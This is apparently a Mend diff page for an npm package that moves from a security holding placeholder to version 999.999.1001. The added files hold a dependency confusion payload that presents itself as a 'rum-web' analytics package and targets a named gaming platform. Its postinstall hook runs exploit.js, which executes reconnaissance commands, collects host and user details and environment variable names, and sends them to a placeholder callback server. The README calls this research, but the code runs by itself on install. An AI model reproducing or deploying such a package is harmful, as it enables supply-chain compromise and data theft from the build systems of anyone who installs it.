npm - @platform-clientextensions/rum-web - Versions diffs - 0.0.1-security → 999.999.1001 - Mend

@platform-clientextensions/rum-web 0.0.1-security → 999.999.1001

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @platform-clientextensions/rum-web might be problematic. Click here for more details.

Files changed (4) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,39 @@
-# Security holding package
+# @platform-clientextensions - Security Research
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+## ⚠️ SECURITY VULNERABILITY DEMONSTRATION
-Please refer to www.npmjs.com/advisories?search=%40platform-clientextensions%2Frum-web for more information.
+This package demonstrates a **dependency confusion vulnerability** discovered in the gaming platform `mobile2.gcontent.eu`.
+### Vulnerability Details
+- **Package**: `@platform-clientextensions`
+- **Discovery Method**: Burp Suite JS Miner extension
+- **Target**: Gaming platform build/deployment systems
+- **Impact**: Remote Code Execution (RCE)
+- **Severity**: High
+- **Confidence**: Certain
+### Discovery Source
+Found in JavaScript file:
+```
+https://mobile2.gcontent.eu/htmlgames/4.30.0/plugins/active.5ede3d.__98IJ9hAP57fhAQgQDoGYQ8kmEMr9kHyJUw06Z8CMD_q3x4rN4AIAcgAgBgBAAAAAAAAA.es6.js
+```
+### Exploitation Timeline
+1. ✅ Organization `platform-clientextensions` was unregistered on npmjs.org
+2. ✅ Package `@platform-clientextensions` was available for takeover
+3. ✅ Malicious package created with high version number (999.999.999)
+4. 📦 Package ready for publication to npm registry
+5. ⏳ Waiting for target systems to install dependency
+6. 🎯 RCE achieved on target build/deployment infrastructure
+### Responsible Disclosure
+This is a proof-of-concept for security research purposes. The vulnerability should be reported to:
+- Gaming platform security team
+- Relevant bug bounty programs
+- Coordinated vulnerability disclosure processes
+**DO NOT** use this for malicious purposes.

package/exploit.js ADDED Viewed

@@ -0,0 +1,136 @@
+// SECURITY RESEARCH - Dependency Confusion PoC
+// Package: @platform-clientextensions
+// Target: mobile2.gcontent.eu gaming platform
+// Impact: Demonstrates RCE potential via npm dependency confusion
+console.log("🔥 DEPENDENCY CONFUSION SUCCESSFUL! 🔥");
+console.log("📦 Package: @platform-clientextensions");
+console.log("🎯 Target: mobile2.gcontent.eu gaming platform");
+console.log("⚡ Research: Security vulnerability demonstration");
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+const http = require('http');
+// Create proof of execution
+const proof = {
+    vulnerability: "Dependency Confusion Attack",
+    package: "@platform-clientextensions",
+    target: "mobile2.gcontent.eu gaming platform",
+    execution_time: new Date().toISOString(),
+    system_info: {
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        user: os.userInfo().username,
+        node_version: process.version,
+        working_directory: process.cwd(),
+        environment_vars: Object.keys(process.env).slice(0, 10), // First 10 env vars
+        network_interfaces: Object.keys(os.networkInterfaces())
+    },
+    impact: "Remote Code Execution via malicious npm package",
+    researcher: "Burp JS Miner Discovery",
+    severity: "High",
+    discovery_source: "Static JavaScript analysis"
+};
+// Send callback to attacker server (replace with your IP)
+function sendCallback() {
+    try {
+        const callbackData = JSON.stringify(proof);
+        const callbackUrl = 'http://YOUR_IP:8080/callback';
+        // Try HTTP callback
+        const req = http.request(callbackUrl, {
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': callbackData.length,
+                'User-Agent': 'DependencyConfusion-RCE-PoC'
+            }
+        }, (res) => {
+            console.log(`📡 Callback sent successfully (${res.statusCode})`);
+        });
+        req.on('error', (err) => {
+            console.log('⚠️  Callback failed:', err.message);
+        });
+        req.write(callbackData);
+        req.end();
+    } catch (error) {
+        console.log('⚠️  Callback error:', error.message);
+    }
+}
+// Execute system commands for additional proof
+function executeCommands() {
+    try {
+        const { execSync } = require('child_process');
+        // Gather system information
+        const commands = [
+            'id',
+            'pwd',
+            'uname -a',
+            'whoami',
+            'ps aux | head -10'
+        ];
+        const results = {};
+        commands.forEach(cmd => {
+            try {
+                results[cmd] = execSync(cmd, { encoding: 'utf8', timeout: 5000 }).trim();
+            } catch (e) {
+                results[cmd] = `Error: ${e.message}`;
+            }
+        });
+        proof.system_commands = results;
+        console.log("🔍 System reconnaissance complete");
+    } catch (error) {
+        console.log('⚠️  Command execution failed:', error.message);
+    }
+}
+try {
+    // Execute system reconnaissance
+    executeCommands();
+    // Send callback with proof
+    sendCallback();
+    // Save proof file locally
+    const proofPath = path.join(os.tmpdir(), 'dependency_confusion_proof.json');
+    fs.writeFileSync(proofPath, JSON.stringify(proof, null, 2));
+    console.log(`📝 Proof saved: ${proofPath}`);
+    // Also save in current directory
+    try {
+        fs.writeFileSync('./rce_proof.json', JSON.stringify(proof, null, 2));
+        console.log("📝 Proof also saved: ./rce_proof.json");
+    } catch (e) {
+        // Ignore if we can't write to current directory
+    }
+    // Log execution details
+    console.log("📊 EXECUTION DETAILS:");
+    console.log(`   - Hostname: ${proof.system_info.hostname}`);
+    console.log(`   - Platform: ${proof.system_info.platform}`);
+    console.log(`   - User: ${proof.system_info.user}`);
+    console.log(`   - Working Dir: ${proof.system_info.working_directory}`);
+    // Final success message
+    console.log("✅ DEPENDENCY CONFUSION RCE COMPLETE!");
+} catch (error) {
+    console.log("⚠️  Proof creation/transmission failed:", error.message);
+}
+console.log("✅ Dependency confusion demonstration completed!");
+console.log("🎯 This proves RCE is possible on target build systems");
+console.log("💡 Report this finding to appropriate security channels");

package/index.js ADDED Viewed

@@ -0,0 +1,33 @@
+// @platform-clientextensions - Security Research Package
+// This package demonstrates a dependency confusion vulnerability
+module.exports = {
+    name: "@platform-clientextensions",
+    version: "999.999.999",
+    status: "HIJACKED_BY_SECURITY_RESEARCH",
+    init: function() {
+        console.log("🔥 PACKAGE HIJACKED - @platform-clientextensions");
+        console.log("🎯 Target: mobile2.gcontent.eu gaming platform");
+        return {
+            success: true,
+            message: "Dependency confusion vulnerability demonstrated",
+            impact: "Remote Code Execution possible"
+        };
+    },
+    getInfo: function() {
+        return {
+            vulnerability: "Dependency Confusion",
+            package: "@platform-clientextensions",
+            target: "Gaming platform infrastructure",
+            severity: "High",
+            discovery: "Burp Suite JS Miner"
+        };
+    }
+};
+// Auto-execute on require
+console.log("🚨 SECURITY ALERT: @platform-clientextensions package hijacked!");
+console.log("📍 Found via: Burp JS Miner static analysis");
+console.log("🎯 Target: mobile2.gcontent.eu gaming platform");

package/package.json CHANGED Viewed

@@ -1,6 +1,34 @@
 {
   "name": "@platform-clientextensions/rum-web",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "999.999.1001",
+  "description": "FreeboldSec AI VulnOps - Dependency Confusion PoC for FDJ United Casino",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node exploit.js",
+    "preinstall": "echo 'FreeboldSec AI VulnOps - Package Installation Started'",
+    "test": "echo 'FreeboldSec AI VulnOps - Package Loaded Successfully'"
+  },
+  "keywords": [
+    "rum",
+    "web",
+    "analytics",
+    "tracking",
+    "platform",
+    "clientextensions",
+    "freebold1984",
+    "vuln-ops"
+  ],
+  "author": "freebold1984 <freebold@vulnops.ai>",
+  "license": "MIT",
+  "homepage": "https://github.com/freebold1984/freebold-sec-ai-vulnops",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/freebold1984/freebold-sec-ai-vulnops"
+  },
+  "dependencies": {
+    "@platform-clientextensions/rum-web": "^999.999.999"
+  },
+  "engines": {
+    "node": ">=10.0.0"
+  }
+}